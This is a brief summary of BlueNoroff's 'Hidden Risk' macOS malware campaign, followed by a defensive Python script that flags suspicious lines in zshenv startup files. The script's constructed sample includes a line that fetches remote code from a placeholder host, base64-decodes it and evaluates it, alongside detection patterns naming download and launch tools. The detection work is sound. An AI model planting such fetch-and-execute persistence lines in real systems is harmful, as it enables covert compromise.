SentinelLabs observed North Korea-linked threat actor BlueNoroff targeting businesses in the crypto industry with a new multi-stage macOS malware called 'Hidden Risk.'
The attackers used fake cryptocurrency news emails and a malicious app disguised as a PDF document to initiate the attack.
The malware establishes persistence through the zshenv configuration file, a novel method that sidesteps macOS's notifications and so improves its stealth.
The campaign is attributed to BlueNoroff, a group known for targeting the crypto and Web3 sectors, and shows the group's continued adaptation and refinement of its attack methods.
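Because zshenv is read by every zsh invocation, a defender's first check is simply to review what those files contain. The script below is an added example written for this page; it is not code from SentinelLabs or from the report. It audits the text of a ~/.zshenv-style file and returns the lines that match review heuristics (network downloads, base64 decoding, execution from hidden or temporary paths, backgrounded commands, inline interpreter one-liners). The heuristics, the `SAMPLE_ZSHENV` file and the `example.invalid` URL are all constructed for illustration and are not indicators from the report.

```python
"""Audit zsh startup files for persistence-style entries (added defensive example)."""
import os
import re
from pathlib import Path

# Review heuristics. Constructed for this example; they are NOT indicators
# taken from the SentinelLabs report. Order determines the order of reasons.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\s"), "network download in startup file"),
    (re.compile(r"\bbase64\b.*\s(-d|--decode)\b"), "base64 decode"),
    (re.compile(r"(/tmp/|/private/tmp/|/var/folders/"
                r"|\$HOME/\.[A-Za-z0-9_-]+/|~/\.[A-Za-z0-9_-]+/"
                r"|/Users/[^/\s]+/\.[A-Za-z0-9_-]+/)"),
     "execution from hidden or temp path"),
    (re.compile(r"\b(nohup|disown)\b|&\s*$"), "backgrounded command"),
    (re.compile(r"^\s*(\S+/)?(python3?|osascript|bash|sh|zsh)\s+-[ce]\b"),
     "inline interpreter one-liner"),
    (re.compile(r"\b(launchctl|chmod\s+\+x|xattr\s+-d)\b"),
     "launch/permission change"),
]

# A plain VAR=value / export VAR=value line with no command substitution,
# pipes or chaining is treated as low risk so that ordinary PATH/EDITOR
# settings do not flood the output. Attackers can still abuse such lines
# (e.g. a poisoned PATH), so review them separately if needed.
PLAIN_ASSIGNMENT = re.compile(r"^\s*(export\s+)?[A-Za-z_][A-Za-z0-9_]*=[^;&|`]*$")

# Constructed sample of a tampered-looking ~/.zshenv (not a real artefact).
SAMPLE_ZSHENV = """\
# ~/.zshenv (constructed sample for this example)
export PATH="$HOME/.local/bin:$PATH"
export EDITOR=vim
# benign comment mentioning curl
eval "$(curl -fsSL https://example.invalid/update | base64 -d)"
[ -x "$HOME/.config/.tools/update" ] && "$HOME/.config/.tools/update" >/dev/null 2>&1 &
"""


def audit_zshenv_text(text):
    """Return [(line_number, line, [reasons])] for lines worth a human review.

    Whole-line comments are skipped. Comments are otherwise not stripped, so
    a false positive is possible on a trailing comment; that is preferable to
    missing a command for a startup file that should normally be short.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if PLAIN_ASSIGNMENT.match(line) and "$(" not in line:
            continue
        reasons = [reason for pattern, reason in SUSPICIOUS_PATTERNS
                   if pattern.search(line)]
        if reasons:
            findings.append((lineno, line, reasons))
    return findings


def default_zshenv_paths():
    """Locations zsh reads zshenv from: system-wide, $HOME and $ZDOTDIR."""
    paths = [Path("/etc/zshenv"), Path.home() / ".zshenv"]
    zdotdir = os.environ.get("ZDOTDIR")
    if zdotdir:
        paths.append(Path(zdotdir) / ".zshenv")
    return paths


def audit_zshenv_files(paths=None):
    """Audit every existing zshenv file in `paths`; returns {path: findings}."""
    results = {}
    for path in (paths or default_zshenv_paths()):
        if path.is_file():
            results[str(path)] = audit_zshenv_text(path.read_text(errors="replace"))
    return results


if __name__ == "__main__":
    print("== constructed sample ==")
    for lineno, line, reasons in audit_zshenv_text(SAMPLE_ZSHENV):
        print(f"line {lineno}: {', '.join(reasons)}\n    {line}")
    print("== files on this host ==")
    for path, findings in audit_zshenv_files().items():
        print(f"{path}: {len(findings)} line(s) to review")
```

Run it as-is to see the constructed sample flagged, then on a host it reports how many lines in each real zshenv file deserve a look; a zshenv that should be empty or contain only a few exports but suddenly launches something in the background is the kind of change worth escalating.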